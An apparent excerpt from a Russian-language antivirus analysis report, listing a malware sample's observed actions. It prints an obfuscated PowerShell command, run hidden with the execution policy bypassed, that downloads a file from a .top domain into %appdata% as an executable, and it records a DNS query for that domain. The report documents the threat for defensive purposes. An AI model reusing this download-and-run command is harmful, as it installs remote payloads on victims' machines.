Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWERs^h^E^lL.eX^e^ -e^X^eCUtIO^NpOLicY byP^asS -N^O^Pr^OFi^lE -W^indOwsTY^le H^iddeN (nE^W-oBJE^ct ^sySt^Em^.^NeT.^W^EbC^LiEnT^)^.D^OW^NLO^A^D^F^i^L^E('http://sutraponef.t...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "P^OWERs^h^E^lL.eX^e^ -e^X^eCUtIO^NpOLicY byP^asS -N^O^Pr^OFi^lE -W^indOwsTY^le H^iddeN (nE^W-oBJE^ct ^sySt^Em^.^NeT.^W^EbC^LiEnT^)^.D^OW^NLO^A^D^F^i^L^E('http://sutraponef.t...' (со скрытым окном)